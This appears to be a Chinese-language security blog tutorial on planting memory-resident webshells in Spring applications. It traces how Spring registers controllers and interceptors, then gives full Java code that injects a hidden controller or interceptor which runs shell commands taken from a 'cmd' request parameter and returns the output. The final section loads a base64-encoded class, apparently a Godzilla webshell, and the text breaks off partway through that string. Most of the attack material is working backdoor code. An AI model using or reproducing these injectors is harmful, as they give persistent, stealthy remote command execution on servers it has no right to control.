Controller 内存马
Interceptor 拦截马
以及结合哥斯拉马的利用
基础知识
controller
Controller负责处理DispatcherServlet 分发的请求,将用户请求处理后封装成model返回给view。
在springmvc种用@Controller标记一个类为Controller。然后用@RequestMapping等来定义URL请求和Controller方法间的映射
Controller的注册
在DoDispatch处由DispatcherServlet处理web请求
往上找一下mappedHandler是什么,往上看,mappedHandler是对handlerMapping进行遍历,
继续跟进getHandler
继续跟进getHandlerInternal里面
上面就是一个调用流程,重要的是这里,mappingRegistry存储了路由信息
也就是说模拟注册向mappingRegistry中添加内存马路由,就能注入内存马。
在AbstractHandlerMethodMapping中就提供了registryMapping添加路由。但是该类为抽象类。它的 子类RequestMappingHandlerMapping能进行实例化
RequestMappingHandlerMapping分析
AbstractHandlerMethodMapping的afterProperties用于bean初始化
initHandlerMethod()遍历所有bean传入processCandidatebean处理bean,也就是controller
getType获取bean类型,通过isHandler进行类型判断,如果bean类型是controller活着RequestMapping注解,就进入detectHandlerMethods解析bean
在deletectHandlerMethods中,用getMappingForMethod创建RequestMappingInfo
处理完后用registryHandlerMethod建立方法到RequestMappingInfo的映射,也就是注册路由
mappingRegistry路由信息
registry传入的参数mapping,handler,method。mapping存储了方法映射的URL路径。handler为controller对象。method为反射获取的方法
Controller内存马构造
1、获取WebApplicationContext
在内存马构造中,都会获取容器的context对象。在Tomcat中获取的是StandardContext,spring中获取的是WebApplicationContext。(在controller类声明处打上断点可以看到初始化WebApplicationContext的过程)WebApplicationContext继承了BeanFactory,所以能用getBean直接获取RequestMappingHandlerMapping,进而注册路由。
所以重点是如何获取WebApplicationContext:
获取WebApplicationContext:
由于webApplicationContext对象存放于servletContext中。并且键值为
WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE
所以可以直接用servletContext#getAttribute()获取属性值
WebApplicationContext wac = (WebApplicationContext)servletContext.getAttribute(WebApplicationContext.ROOT_WEB_APPLICATION_CONTEXT_ATTRIBUTE);
webApplicationContextUtils提供了下面两种方法获取webApplicationContext。需要传入servletContext
WebApplicationContextUtils.getRequeiredWebApplicationContext(ServletContext s);
WebApplicationContextUtils.getWebApplicationContext(ServletContext s);
spring 5的WebApplicationContextUtils已经没有getWebApplicationContext方法
-
获取ServletContext
通过request对象或者ContextLoader获取ServletContext
// 1 ServletContext servletContext = request.getServletContext(); // 2 ServletContext servletContext = ContextLoader.getCurrentWebApplicationContext().getServletContext(); -
获取request可以用RequestContextHolder
HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder .getRequestAttributes()).getRequest();
spring中获取context的方式一般有以下几种
①直接通过ContextLoader获取,不用再经过servletContext。不过ContextLoader一般会被ban
WebApplicationContext context = ContextLoader.getCurrentWebApplicationContext();
②通过RequestContextHolder获取request,然后获取servletRequest后通过RequestContextUtils得到WebApplicationContext
WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
③用RequestContextHolder直接从键值org.springframework.web.servlet.DispatcherServlet.CONTEXT中获取Context
WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
④直接反射获取WebApplicationContext
java.lang.reflect.Field filed = Class.forName("org.springframework.context.support.LiveBeansView").getDeclaredField("applicationContexts");
filed.setAccessible(true);
org.springframework.web.context.WebApplicationContext context =(org.springframework.web.context.WebApplicationContext) ((java.util.LinkedHashSet)filed.get(null)).iterator().next();
实际上常用的就2,3。
其中1获取的是Root WebApplicationContext,2,3通过RequestContextUtils获取的是叫dispatcherServlet-servlet的Child WebApplicationContext。
在有些Spring 应用逻辑比较简单的情况下,可能没有配置
ContextLoaderListener、也没有类似applicationContext.xml的全局配置文件,只有简单的servlet配置文件,这时候通过1方法是获取不到Root WebApplicationContext的。
此内存马适合 springboot<2.6版本
package com.example.springboot12345.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;
import java.util.Scanner;
@RestController
public class InjectController {
@RequestMapping("/inject")
public String inject() throws Exception{
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Method method = InjectedController.class.getMethod("cmd");
PatternsRequestCondition url = new PatternsRequestCondition("/evilcontroller");
RequestMethodsRequestCondition condition = new RequestMethodsRequestCondition();
RequestMappingInfo info = new RequestMappingInfo(url, condition, null, null, null, null, null);
InjectedController injectedController = new InjectedController();
requestMappingHandlerMapping.registerMapping(info, injectedController, method);
return "Inject done";
}
@RestController
public class InjectedController {
public InjectedController(){
}
public void cmd() throws Exception {
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
if (request.getParameter("cmd") != null) {
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
Scanner s = new Scanner(in).useDelimiter("\\A");
String output = s.hasNext() ? s.next() : "";
response.getWriter().write(output);
response.getWriter().flush();
response.getWriter().close();
}
}
}
}
此内存马都可以
package com.example.springboot12345.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Scanner;
@RestController
public class Memshell {
public Memshell(){}
@RequestMapping("/Memshell")
public String Memshell() throws Exception{
try {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config =
(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);
Method method2 = Memshell.class.getMethod("shell", HttpServletRequest.class, HttpServletResponse.class);
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
RequestMappingInfo info = RequestMappingInfo.paths("/shell")
.options(config)
.build();
Memshell springControllerMemShell = new Memshell();
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
} catch (Exception hi) {
// hi.printStackTrace();
}
return "success";
}
public void shell(HttpServletRequest request, HttpServletResponse response) throws IOException {
if (request.getParameter("cmd") != null) {
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
Scanner s = new Scanner(in).useDelimiter("\\A");
String output = s.hasNext() ? s.next() : "";
response.getWriter().write(output);
response.getWriter().flush();
}
}
}
Interceptor拦截器内存马构造
Interceptor和Tomcat和Filter过滤器很类似。区别如下:
- Interceptor基于反射,Filter基于函数回调
- Interceptor不依赖servlet容器
- Interceptor只能对action请求有用
- Interceptor可以访问action上下文,栈里的对象。Filter不能
- action生命周期中,Interceptor可以被多次调用,Filter只在容器初始化时调用一次
- Interceptor可以获取IOC容器中的bean,Filter不行
由以上区别,Interceptor的应用和过滤器也就不同,Interceptor用来做日志记录,过滤器用来过滤非法操作
源码分析
DispatcherServlet.doDispatch中,进行了getHandler,持续跟进发现最终调用的是
该方法从adaptedInterceptors中把符合的拦截器添加到chain里。 adaptedInterceptors就存放了全部拦截器
返回到DispatcherServlet#doDispatch(),然后执行了applyPreHandle遍历执行了拦截器。
可以看到里面就是preHandle方法,并且拦截器的下面才是我们的那一串controller东西,所以是先执行拦截器然后执行controller
(D3CTF里面,Boo👨🎓也就是利用这个来完成的清空列表黑名单)
偷得一张调用流程图,dofilter>拦截器>controller
- preHandle( ):该方法在控制器的处理请求方法前执行,其返回值表示是否中断后续操作,返回 true 表示继续向下执行,返回 false 表示中断后续操作。
- postHandle( ):该方法在控制器的处理请求方法调用之后、解析视图之前执行,可以通过此方法对请求域中的模型和视图做进一步的修改。
- afterCompletion( ):该方法在控制器的处理请求方法执行完成后执行,即视图渲染结束后执行,可以通过此方法实现一些资源清理、记录日志信息等工作。
1、获取RequestMappingHandlerMapping
在AbstractHandlerMapping中进行的添加拦截器,但这个类是抽象类,可以获取其实现类RequestMappingHandlerMapping,和前面的一样了就
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
2、反射获取adaptedInterceptors
获取adaptedInterceptors,反射赋值,并且传入RequestMappingHandlerMapping初始化
Field field = null;
try {
field = RequestMappingHandlerMapping.class.getDeclaredField("adaptedInterceptors");
} catch (NoSuchFieldException e) {
e.printStackTrace();
}
field.setAccessible(true);
List<HandlerInterceptor> adaptInterceptors = null;
try {
adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
} catch (IllegalAccessException e) {
e.printStackTrace();
}
3.添加恶意Interceptors
adaptInterceptors.add(new InjectEvilInterceptor("a"));
package org.example.springmvc;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.List;
import java.util.Scanner;
public class InjectInterceptor implements HandlerInterceptor {
static {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field field = null;
try {
field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
} catch (NoSuchFieldException e) {
e.printStackTrace();
}
field.setAccessible(true);
List<HandlerInterceptor> adaptInterceptors = null;
try {
adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
} catch (IllegalAccessException e) {
e.printStackTrace();
}
InjectInterceptor evilInterceptor = new InjectInterceptor();
adaptInterceptors.add(evilInterceptor);
}
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
if (request.getParameter("cmd") != null) {
try{
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
Scanner s = new Scanner(in).useDelimiter("\\A");
String output = s.hasNext() ? s.next() : "";
response.getWriter().write(output);
response.getWriter().flush();
response.getWriter().close();
} catch (Exception e) {
e.printStackTrace();
}
return false;
}
return true;
}
@Override
public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
}
@Override
public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
}
}
修改一下
package com.example.springboot12345.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.List;
import java.util.Scanner;
@RestController
public class InjectInterceptor implements HandlerInterceptor {
@RequestMapping("/aaa")
public void aaa(){
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field field = null;
try {
field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
} catch (NoSuchFieldException e) {
e.printStackTrace();
}
field.setAccessible(true);
List<HandlerInterceptor> adaptInterceptors = null;
try {
adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
} catch (IllegalAccessException e) {
e.printStackTrace();
}
InjectInterceptor evilInterceptor = new InjectInterceptor();
adaptInterceptors.add(evilInterceptor);}
@Override
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
if (request.getParameter("cmd") != null) {
try{
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
Scanner s = new Scanner(in).useDelimiter("\\A");
String output = s.hasNext() ? s.next() : "";
response.getWriter().write(output);
response.getWriter().flush();
response.getWriter().close();
} catch (Exception e) {
e.printStackTrace();
}
return false;
}
return true;
}
@Override
public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
}
@Override
public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
}
}
访问二次才能执行(因为第一次拦截器是放入里面,第二次才会执行)
第一次访问不会执行preHandler,第二次访问才会执行
可以发现
下面是判定流程
接下来是闲着无聊,又想打马时间(纯2B)
这里直接搞了一个路由,然后初始化了以前文章写的哥斯拉内存马,访问页面发现直接成功了
换一种方式用define类加载字节码,来搞毕竟远程环境没有这个类
也是可以的直接搞
public class lastone {
@RequestMapping("/JYcxk")
public void abc() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
String base64Class = "yv66vgAAADQBWwoAXACpCACqCQBOAKsIAF8JAE4ArAcArQoABgCpCgAGAK4KAAYArwoATgCwCQBOALEIALIKALMAtAoAIQC1CgAhALYKALMAtwcAuAoAswC5CgARALoKABEAuwoAIQC8BwC9CAC+CgAeAL8IAMAKAB4AwQoAwgDDCgAgAMQIAMUHAMYHAH0HAMcHAMgIAMkKAB4AyggAywgAzAgAzQgAzggAzwgA0AoA0QDSBwDTCgArANQKANEA1QoA0QDWBwDXBwDYCgDZANoKANkA2woALwDcBwDdCADeCQDfAOAKAB4A4QoAwgDiCgDfAOMLAOQA5QoATgDmCgBOAOcJAE4A6AoATgDpBwDqCgA/AKkKACAA6wsA7ADtCgAhAO4KAO8A8AoAIACvCgA/APEKAE4A8goAIQDzBwD0CAD1CQBOAPYIAPcJAE4A+AcA+QoATgCpBwD6CgBQAPsLAPwA/QcA/goAUwD/CwEAAQELAQABAgsBAAEDCgAeAQQLAQABBQoAUwEGCgBTAQcHAQgBAAJ4YwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHBhc3MBAAdwYXR0ZXJuAQALc2VydmxldE5hbWUBAANtZDUBAAdwYXlsb2FkAQARTGphdmEvbGFuZy9DbGFzczsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEANExjb20vZXhhbXBsZS9zcHJpbmdib290MTIzNDUvQ29udHJvbGxlci9Hb2R6aWxsYU1lbTsBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAAW0BAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAAXMBAANyZXQBAA1TdGFja01hcFRhYmxlBwDIBwC9AQAQTWV0aG9kUGFyYW1ldGVycwEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAGYmFzZTY0AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAAmJzAQACW0IBAAV2YWx1ZQEACkV4Y2VwdGlvbnMBAAxiYXNlNjREZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAHZGVjb2RlcgEAAXgBAAcoW0JaKVtCAQABYwEAFUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAAVoHAPkHAQkBAAhkZWZDbGFzcwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEACmNsYXNzQnl0ZXMBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAlkZWZNZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABmRvUG9zdAEAUihMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7KVYBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEABGRhdGEBAANyZXEBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAARyZXNwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwcA9AcBCgcBCwEACDxjbGluaXQ+AQAHc2VydmxldAEAF0xqYXZheC9zZXJ2bGV0L1NlcnZsZXQ7AQAVd2ViYXBwQ2xhc3NMb2FkZXJCYXNlAQAyTG9yZy9hcGFjaGUvY2F0YWxpbmEvbG9hZGVyL1dlYmFwcENsYXNzTG9hZGVyQmFzZTsBAAtzdGFuZGFyZEN0eAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACm5ld1dyYXBwZXIBAB1Mb3JnL2FwYWNoZS9jYXRhbGluYS9XcmFwcGVyOwEAClNvdXJjZUZpbGUBABBHb2R6aWxsYU1lbS5qYXZhDABlAGYBABAzYzZlMGI4YTljMTUyMjRhDABdAF4MAF8AXgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDAEMAQ0MAQ4BDwwAYgBsDABiAF4BAANNRDUHARAMAREBEgwBEwEUDAEVARYMARcBGAEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAEZARQMAGUBGgwBDgEbDAEcAQ8BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQamF2YS51dGlsLkJhc2U2NAwBHQEeAQAKZ2V0RW5jb2RlcgwBHwEgBwEhDAEiASMMASQBJQEADmVuY29kZVRvU3RyaW5nAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAEmAScBAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgEAA0FFUwcBCQwBEQEoAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwAZQEpDAEqASsMASwBLQEAF2phdmEvbmV0L1VSTENsYXNzTG9hZGVyAQAMamF2YS9uZXQvVVJMBwEuDAEvATAMATEBMgwAZQEzAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MHATQMATUAZAwBNgEgDAE3ATgMATkBOgcBOwwBPABsDACAAIEMAIMAhAwAYwBkDACKAIsBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBPQE+BwE/DAFAAUEMAUIBQwcBRAwBRQFGDAFHARQMAHUAdgwBQgEbAQATamF2YS9sYW5nL1Rocm93YWJsZQEABS9sb2dzDABgAF4BAApKVk1TZXJ2aWNlDABhAF4BADJjb20vZXhhbXBsZS9zcHJpbmdib290MTIzNDUvQ29udHJvbGxlci9Hb2R6aWxsYU1lbQEAMG9yZy9hcGFjaGUvY2F0YWxpbmEvbG9hZGVyL1dlYmFwcENsYXNzTG9hZGVyQmFzZQwBSAFJBwFKDAFLAUwBAChvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0DAFNAU4HAU8MAVABRgwBUQFSDAFTAVQMAVUBDwwBVgFGDAFXAVgMAVkBWgEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldAEAE2phdmF4L2NyeXB0by9DaXBoZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAG2phdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdAEAC2dldEluc3RhbmNlAQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEACGdldEJ5dGVzAQAEKClbQgEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQAHZG9GaW5hbAEABihbQilbQgEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBABFnZXREZWNsYXJlZE1ldGhvZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAMZ2V0UGFyYW1ldGVyAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEACXN1YnN0cmluZwEAFihJSSlMamF2YS9sYW5nL1N0cmluZzsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAt0b0J5dGVBcnJheQEADGdldFJlc291cmNlcwEAJygpTG9yZy9hcGFjaGUvY2F0YWxpbmEvV2ViUmVzb3VyY2VSb290OwEAI29yZy9hcGFjaGUvY2F0YWxpbmEvV2ViUmVzb3VyY2VSb290AQAKZ2V0Q29udGV4dAEAHygpTG9yZy9hcGFjaGUvY2F0YWxpbmEvQ29udGV4dDsBAA1jcmVhdGVXcmFwcGVyAQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9XcmFwcGVyOwEAG29yZy9hcGFjaGUvY2F0YWxpbmEvV3JhcHBlcgEAB3NldE5hbWUBABBzZXRMb2FkT25TdGFydHVwAQAEKEkpVgEACnNldFNlcnZsZXQBABooTGphdmF4L3NlcnZsZXQvU2VydmxldDspVgEAB2dldE5hbWUBAA9zZXRTZXJ2bGV0Q2xhc3MBAAhhZGRDaGlsZAEAIihMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250YWluZXI7KVYBABhhZGRTZXJ2bGV0TWFwcGluZ0RlY29kZWQBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KVYAIQBOAFwAAAAGAAAAXQBeAAAAAABfAF4AAAAIAGAAXgAAAAgAYQBeAAAAAABiAF4AAAAAAGMAZAAAAAgAAQBlAGYAAQBnAAAAZgADAAEAAAAwKrcAASoSArUAAyoSBLUABSq7AAZZtwAHKrQABbYACCq0AAO2AAi2AAm4AAq1AAuxAAAAAgBoAAAAEgAEAAAADgAEAA8ACgAQABAAEwBpAAAADAABAAAAMABqAGsAAAAJAGIAbAACAGcAAACnAAQAAwAAADABTBIMuAANTSwqtgAOAyq2AA+2ABC7ABFZBCy2ABK3ABMQELYAFLYAFUynAARNK7AAAQACACoALQAWAAMAaAAAAB4ABwAAACIAAgAlAAgAJgAVACcAKgApAC0AKAAuACoAaQAAACAAAwAIACIAbQBuAAIAAAAwAG8AXgAAAAIALgBwAF4AAQBxAAAAEwAC/wAtAAIHAHIHAHIAAQcAcwAAdAAAAAUBAG8AAAAJAHUAdgADAGcAAAFEAAYABQAAAHIBTRIXuAAYTCsSGQG2ABorAbYAG04ttgAcEh0EvQAeWQMSH1O2ABotBL0AIFkDKlO2ABvAACFNpwA5ThIiuAAYTCu2ACM6BBkEtgAcEiQEvQAeWQMSH1O2ABoZBAS9ACBZAypTtgAbwAAhTacABToELLAAAgACADcAOgAWADsAawBuABYAAwBoAAAAMgAMAAAALwACADEACAAyABUAMwA3ADsAOgA0ADsANgBBADcARwA4AGsAOgBuADkAcAA8AGkAAABIAAcAFQAiAHcAeAADAAgAMgB5AGQAAQBHACQAdwB4AAQAQQAtAHkAZAABADsANQB6AHsAAwAAAHIAfAB9AAAAAgBwAH4AXgACAHEAAAAqAAP/ADoAAwcAHwAHAHIAAQcAc/8AMwAEBwAfAAcAcgcAcwABBwBz+gABAH8AAAAEAAEAFgB0AAAABQEAfAAAAAkAgACBAAMAZwAAAUoABgAFAAAAeAFNEhe4ABhMKxIlAbYAGisBtgAbTi22ABwSJgS9AB5ZAxIhU7YAGi0EvQAgWQMqU7YAG8AAH8AAH02nADxOEie4ABhMK7YAIzoEGQS2ABwSKAS9AB5ZAxIhU7YAGhkEBL0AIFkDKlO2ABvAAB/AAB9NpwAFOgQssAACAAIAOgA9ABYAPgBxAHQAFgADAGgAAAAyAAwAAABBAAIAQwAIAEQAFQBFADoATQA9AEYAPgBIAEQASQBKAEoAcQBMAHQASwB2AE4AaQAAAEgABwAVACUAggB4AAMACAA1AHkAZAABAEoAJwCCAHgABABEADAAeQBkAAEAPgA4AHoAewADAAAAeAB8AF4AAAACAHYAfgB9AAIAcQAAACoAA/8APQADBwByAAcAHwABBwBz/wA2AAQHAHIABwAfBwBzAAEHAHP6AAEAfwAAAAQAAQAWAHQAAAAFAQB8AAAAAQCDAIQAAgBnAAAA2AAGAAQAAAAsEim4ACpOLRyZAAcEpwAEBbsAK1kqtAADtgAOEim3ACy2AC0tK7YALrBOAbAAAQAAACgAKQAWAA